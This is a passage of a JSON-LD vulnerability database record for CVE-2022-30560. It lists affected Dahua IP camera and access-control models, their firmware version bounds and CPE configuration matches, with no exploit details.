          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202206-2212",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ipc-hfw2239m-as-led-b-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hdbw2431r-zas-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hdbw2831e-s-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hfw2531s-s-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "asi7223x-a-t1",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2021-09"
          },
          {
            "model": "ipc-hfw2239s-sa-led-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hdbw2431e-s-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "asi7213x-t1",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2021-09"
          },
          {
            "model": "ipc-hfw2831t-zas-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hfw2231t-zas-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hfw2439m-as-led-b-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hdbw2831r-zs-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hfw2231s-s-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hfw2831t-zs-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hfw2531t-zs-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hdbw2231e-s-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hdbw2831r-zas-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hdbw2231r-zas-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hfw2431s-s-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hdbw2231f-as-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hfw2231m-as-i2-b-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hfw2431t-zas-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hfw2439s-sa-led-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hdbw2531r-zas-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "asi7223x-a",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2021-09"
          },
          {
            "model": "asi7213x",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2021-09"
          },
          {
            "model": "ipc-hfw2831t-as-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hdbw2431r-zs-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hfw2231t-as-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hfw2431t-zs-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hdbw2531r-zs-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hdbw2531e-s-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hdbw2231r-zs-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hfw2831s-s-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hfw2531t-as-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hfw2431t-as-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hfw2531t-zas-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hfw2231t-zs-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hdbw2230e-s-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hfw2230s-s-s2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2022-04"
          },
          {
            "model": "ipc-hdbw2431e-s-s2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hdbw2231e-s-s2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hfw2231t-zs-s2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hfw2231t-zas-s2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hdbw2231r-zs-s2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hdbw2231f-as-s2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hdbw2531e-s-s2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hdbw2231r-zas-s2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hdbw2831r-zs-s2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hdbw2831e-s-s2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hdbw2431r-zs-s2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hdbw2531r-zs-s2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hfw2231t-as-s2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hfw2231m-as-i2-b-s2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hdbw2831r-zas-s2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hdbw2431r-zas-s2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hdbw2531r-zas-s2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hdbw2230e-s-s2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hfw2231s-s-s2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hdbw2xxx",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "ipc-hfw2xxx",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "asi7xxxx",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2022-60683"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-012804"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-30560"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2431e-s-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2431e-s-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2831e-s-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2831e-s-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2230e-s-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2230e-s-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2831r-zs-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2831r-zs-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2831r-zas-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2831r-zas-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2831e-s-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2831e-s-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2531r-zs-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2531r-zs-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2531r-zas-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2531r-zas-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2531e-s-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2531e-s-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2431r-zs-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2431r-zs-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2431r-zas-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2431r-zas-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2231f-as-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2231f-as-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2231e-s-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2231e-s-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2231r-zs-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2231r-zs-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2231r-zas-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2231r-zas-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2231m-as-i2-b-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2231m-as-i2-b-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2231t-as-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2231t-as-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2231s-s-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2231s-s-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2231t-zs-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2231t-zs-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2231t-zas-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2231t-zas-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2230s-s-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2230s-s-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2431t-as-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2431t-as-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2431t-zs-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2431t-zs-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2431t-zas-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2431t-zas-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2431s-s-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2431s-s-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2531t-as-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2531t-as-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2531t-zs-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2531t-zs-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2531t-zas-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2531t-zas-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2531s-s-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2531s-s-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2831t-as-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
